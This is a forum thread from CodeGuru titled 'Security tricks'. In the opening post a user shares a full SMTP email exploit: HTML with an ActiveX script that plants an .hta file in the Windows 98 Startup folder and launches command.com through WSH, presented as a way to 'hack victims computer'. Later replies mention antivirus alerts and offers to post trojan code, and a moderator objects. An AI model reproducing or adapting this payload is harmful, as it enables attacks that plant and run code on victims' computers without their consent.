CodeGuru Home VC++ / MFC / C++ .NET / C# Visual Basic VB Forums Developer.com
Results 1 to 11 of 11

Thread: Security tricks

  1. #1
    Join Date
    Mar 2004
    Location
    Ukraine
    Posts
    170

    Security tricks

    In this thread we will talk about viruses computer security and cryptography. As I said yesterday I put some tricks how to hack victims computer.
    To make some computer download and launch some files we may use e-mail with necessary commands of SMTP , also we may with help of those commands launch some ActiveX components on our victims computer. This code and information was taken from www.guinski.com/scrtlb-desc.html
    Code:
    	helo somedomain.com
    	mail from: mallory@somedomain.com
    	rcpt to: victim@victim.com
    	data
    	subject: You need to Read this
    	MIME-version 1.0
    	Content-Type: text/html; charset=us-ascii
    	Content-Tranfer-Encoding: 7bit
    	If You have received this message in error please delete it;)
    	<object id=”scr” classid=”clsid:06290BD5-48AA-11D2-8432-006008C3FBFC”>
    	</object>
    	<SCRIPT>
    	scr.Reset();
    	scr.Path=”C:\\WIN98\\start menu\\programs\\startup\\attack.hta”;
    	scr.Doc=”<object id=’wsh’ classid=clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B’>
    </object>
    <SCRIPT> alert(‘Your security was destroyed’);wsh.Run(‘C:\\WIN98\\command.com’);
    </”+”SCRIPT>”;
    scr.write();
    </SCRIPT>
    </object>
    .
    quit
    So with help of this thing, when our victim opens our mail in his Outlook Express, file with some scenario is placed to his computer, and when he reboot system he will got troubles .
    God could improve essentially a
    human nature, but he
    was too anxious with compatibility
    with the monkey.
    (Eugeny Goldberg)

  2. #2
    Join Date
    May 2005
    Location
    Kuwait
    Posts
    65

    Re: Security tricks

    But the problem is that my McAfee will even alert me if this thing comes in my browser!!!!! - it tries to clean the cache!

    Screenshot attached

    EDIT : TO be more clear, that alert came while I was viewing this thread!
    Attached Images Attached Images  
    BJxtreme
    If you like a post, rate it

    "Flattery is the art of telling another person exactly what he thinks of himself"

  3. #3
    Join Date
    Mar 2004
    Location
    Ukraine
    Posts
    170

    Re: Security tricks

    Quote Originally Posted by bijuabrahamp
    But the problem is that my McAfee will even alert me if this thing comes in my browser!!!!! - it tries to clean the cache!

    Screenshot attached

    EDIT : TO be more clear, that alert came while I was viewing this thread!
    hmm, Need to think about this. But this trick is old enough so AntiVirus software detect it.
    God could improve essentially a
    human nature, but he
    was too anxious with compatibility
    with the monkey.
    (Eugeny Goldberg)

  4. #4
    Join Date
    May 2005
    Location
    Kuwait
    Posts
    65

    Re: Security tricks

    Quote Originally Posted by Skoons
    hmm, Need to think about this. But this trick is old enough so AntiVirus software detect it.
    Yeah.. I think you are right

    McAfee disabled... causing too much problem when i read this thread
    Attached Images Attached Images  
    BJxtreme
    If you like a post, rate it

    "Flattery is the art of telling another person exactly what he thinks of himself"

  5. #5
    Join Date
    Mar 2004
    Location
    Ukraine
    Posts
    170

    Re: Security tricks

    Quote Originally Posted by bijuabrahamp
    Yeah.. I think you are right

    McAfee disabled... causing too much problem when i read this thread
    Need to talk with CG admins, about some tags which will completly block unsafe code. But this script is safe enough, because it`s targeting Windows98 and shows only one message that security was broken it illustrates some principles of hacking attacks

    P.S.
    Few minutes ago my computer was attacked by some trojan aplication
    God could improve essentially a
    human nature, but he
    was too anxious with compatibility
    with the monkey.
    (Eugeny Goldberg)

  6. #6
    Join Date
    May 2005
    Location
    Kuwait
    Posts
    65

    Re: Security tricks

    Quote Originally Posted by Skoons
    Few minutes ago my computer was attacked by some trojan aplication
    Oh.. don't go in search of how to make trojans because the same websites which teach u to make can infect ur computer also
    BJxtreme
    If you like a post, rate it

    "Flattery is the art of telling another person exactly what he thinks of himself"

  7. #7
    Join Date
    Mar 2004
    Location
    Ukraine
    Posts
    170

    Re: Security tricks

    Quote Originally Posted by bijuabrahamp
    Oh.. don't go in search of how to make trojans because the same websites which teach u to make can infect ur computer also
    I don`t. I just do nothing everything was perfect, but then my firewall sends me huge number of warnings. I have block this trojans, hmm, interesting what will be with browsers if i will post trojan code
    God could improve essentially a
    human nature, but he
    was too anxious with compatibility
    with the monkey.
    (Eugeny Goldberg)

  8. #8
    Join Date
    May 2005
    Location
    Kuwait
    Posts
    65

    Re: Security tricks

    Quote Originally Posted by Skoons
    I don`t. I just do nothing everything was perfect, but then my firewall sends me huge number of warnings. I have block this trojans, hmm, interesting what will be with browsers if i will post trojan code
    Well.. if ur trojan code is not a script, then post it.. antiviruses cannot recognize uncompiled source code (except scripts)
    BJxtreme
    If you like a post, rate it

    "Flattery is the art of telling another person exactly what he thinks of himself"

  9. #9
    Join Date
    May 2005
    Location
    Kuwait
    Posts
    65

    Re: Security tricks

    Oh.. that virus was a pretty nice one.. wasn't it? It was capturing the news headlines for a period of time.
    But, I think its better if we talk about the exploits that haven't been found - more fun
    BJxtreme
    If you like a post, rate it

    "Flattery is the art of telling another person exactly what he thinks of himself"

  10. #10
    Join Date
    Jun 2001
    Location
    Switzerland
    Posts
    4,443

    Exclamation Re: Security tricks

    People, I have to remind you that posting code for viruses and the like is forbidden here on CodeGuru. Please refrain from such posting in future.

    It is ok to talk about security which of course means that you have to know where the holes are and how an attack works. The final goal of the discussion must however be to find ways for defense and not to find ways to attack.

    Posting virus code is thus beyond the acceptable line IMO.
    Gabriel, CodeGuru moderator

    Forever trusting who we are
    And nothing else matters
    - Metallica

    Learn about the advantages of std::vector.

  11. #11
    Join Date
    Mar 2004
    Location
    Ukraine
    Posts
    170

    Re: Security tricks

    Well, About protection, as you see ActiveX components may cause big danger to your computer. And there are some bad news, you may protect yourself only for some time, with new security updates from Microsoft, and putting your security preferences into high level. But if you think that some other systems are more safe, you are wrong, there are some tricks in windows X systems which may you get screenshots from the remoted computer. About Worms, The best idea is to put all preferences in your browser to high security, and from my own experience, I can tell, that most of all script attacks works very good on IE, and worther on Opera. But it`s only a suggestion. And another part of security problem all hacking attacks including viruse attacks, are used by some people to get your vital information or cause some malfunctions in your important software. To protect your vital information the best idea is to cypher it. About some cypher algorythms I willl post lille bit farther, I need to translate them into English.

    P.S. Sorry for posting viruses code, I was very excited with this problem and have forget CG rules.
    God could improve essentially a
    human nature, but he
    was too anxious with compatibility
    with the monkey.
    (Eugeny Goldberg)

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  


Windows Mobile Development Center


Click Here to Expand Forum to Full Width




On-Demand Webinars (sponsored)